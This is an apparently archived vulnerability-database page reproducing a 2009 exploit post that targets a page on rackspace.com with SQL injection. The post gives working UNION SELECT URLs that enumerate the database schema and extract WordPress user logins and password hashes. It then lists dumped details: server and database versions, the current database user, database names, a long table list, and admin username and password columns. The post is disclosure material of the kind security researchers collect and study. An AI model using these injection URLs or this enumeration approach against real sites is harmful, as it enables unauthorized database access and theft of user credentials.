Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Rackspace SQL Injection

🗓️ 17 Aug 2009 00:00:00Reported by Rohit BansalType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 18 Views

Rackspace SQL Injection vulnerability found by Rohit Bansal on 01-08-2009. Vulnerable to SQL Union Injection. Apache/2.0.52 (Red Hat), PHP/5.1.6, Current User: [email protected], Current Database: rscom, Supports Union: yes, Visible Column:

Code
`--------------------------------------------------------------------------------------------------------------------------  
[+] www.rackspace.com SQL Injection vulnerability  
[+] Found By: Rohit Bansal [ SCHAP Security http://schap.org ]  
[+] Date: 01-08-2009  
  
----------------------------------------------------------------------------------------------------------------------------  
  
  
http://www.rackspace.com/information/mediacenter/award.php?id=-99+uNion+Select+1,2,concat<http://www.rackspace.com/information/mediacenter/award.php?id=-101+uNion+Select+1,2,concat>  
(table_schema,table_name),4%20FROM%20information_schema.tables%20--  
  
http://www.rackspace.com/information/mediacenter/award.php?id=-99+uNion+Select+1,2,concat<http://www.rackspace.com/information/mediacenter/award.php?id=-101+uNion+Select+1,2,concat>  
(user_login,user_pass),4%20FROM%20rscom.wp_users%20--  
  
  
  
Host Information  
  
Server = Apache/2.0.52 (Red Hat)  
Version = 5.0.77-log  
Powered by = PHP/5.1.6  
Attack Type = SQL Union Injection  
Current User = [email protected]  
Current Database = rscom  
Supports Union = yes  
Union Columns = 4  
  
Url| http://www.rackspace.com/information/mediacenter/award.php?id=101  
  
Vuln:  
http://www.rackspace.com/information/mediacenter/award.php?id=101+and+1=0+Union  
Select 1 ,2, UNHEX(HEX([visible])) ,4  
  
Comment: --  
  
Visible Column: 3  
  
Database:rscom  
  
information_schema  
rscom  
rscom_dev  
test  
  
Tables:pp_admin  
jboss_auth  
jboss_users  
pp_admin  
pp_commission_type  
pp_contact  
pp_contact_email  
pp_contact_phone  
pp_contact_type  
pp_contract_type  
pp_employee  
pp_notes  
pp_partner  
pp_partner_auth  
pp_partner_exclusivity  
pp_partner_info  
pp_partner_referredcustomer  
pp_partner_service  
pp_phone_type  
pp_service_type  
pp_status_type  
pp_w9_type  
rackspace_agendas  
rackspace_agendas_data  
rackspace_agendas_data_types  
rackspace_agendas_notes  
rackspace_agendas_participants  
rackspace_bizspark  
rackspace_club  
rackspace_conference_attendees  
rackspace_conference_auth  
rackspace_copyrightnotices  
rackspace_customerbriefing  
rackspace_december8months  
rackspace_leaders  
rackspace_leaders_avatars  
rackspace_logorequests  
rackspace_loophole  
rackspace_me_calculator  
rackspace_newsarticles  
rackspace_partners  
rackspace_partners_questions  
rackspace_partners_questions_options  
rackspace_partners_reps  
rackspace_pressreleases  
rackspace_search  
rackspace_search_sidebar  
rackspace_settings  
rackspace_sitesubmissions  
rackspace_survey  
rackspace_survey_results  
rackspaceipo_auth  
rackspaceipo_content  
rackspaceipo_effectiveness_types  
rackspaceipo_fwprospectus  
rackspaceipo_notices  
rackspaceipo_prospectus  
rackspaceipo_status_types  
rackspacestore_accounts  
rackspacestore_agreements  
rackspacestore_options  
rackspacestore_options_dependants  
rackspacestore_options_types  
rackspacestore_options_values  
rackspacestore_orders  
rackspacestore_payments  
rackspacestore_payments_types  
rackspacestore_products  
rackspacestore_settings  
rackspacestore_shared_orders_options  
rackspacestore_shared_products_options  
rackspacestore_shared_products_specs  
rackspacestore_specs  
rackspacestore_specs_types  
rc_events  
rc_sitesubmissions  
ror_cities  
ror_followup  
ror_registrants  
ror_registrants_rackers  
vendor_auth  
vgb_baskets  
vgb_images  
wp_2_comments  
wp_2_comments_revver  
wp_2_links  
wp_2_options  
wp_2_postmeta  
wp_2_posts  
wp_2_posts_revver  
wp_2_term_relationships  
wp_2_term_taxonomy  
wp_2_terms  
wp_2_usermeta  
wp_2_users  
wp_auth  
wp_comments  
wp_comments_revver  
wp_links  
wp_options  
wp_postmeta  
wp_posts  
wp_posts_revver  
wp_term_relationships  
wp_term_taxonomy  
wp_terms  
wp_usermeta  
wp_users  
  
Columns: Table pp_admin  
admin_username  
admin_password  
  
  
--------------------------------------------------------------------------------------------------------------------------  
[+]^Rohit Bansal [[email protected]]  
[+] Schap.org, Infysec, Evilfinger  
-------------------------------------------------------------------------------------------------------------------------  
  
  
  
--   
"You only get smarter, by playing a smarter opponent !"  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
17 Aug 2009 00:00Current
rackspacesql injectionrohit bansalschap securityapachephpred hatunion injectioncurrent usercurrent databasesupports union
18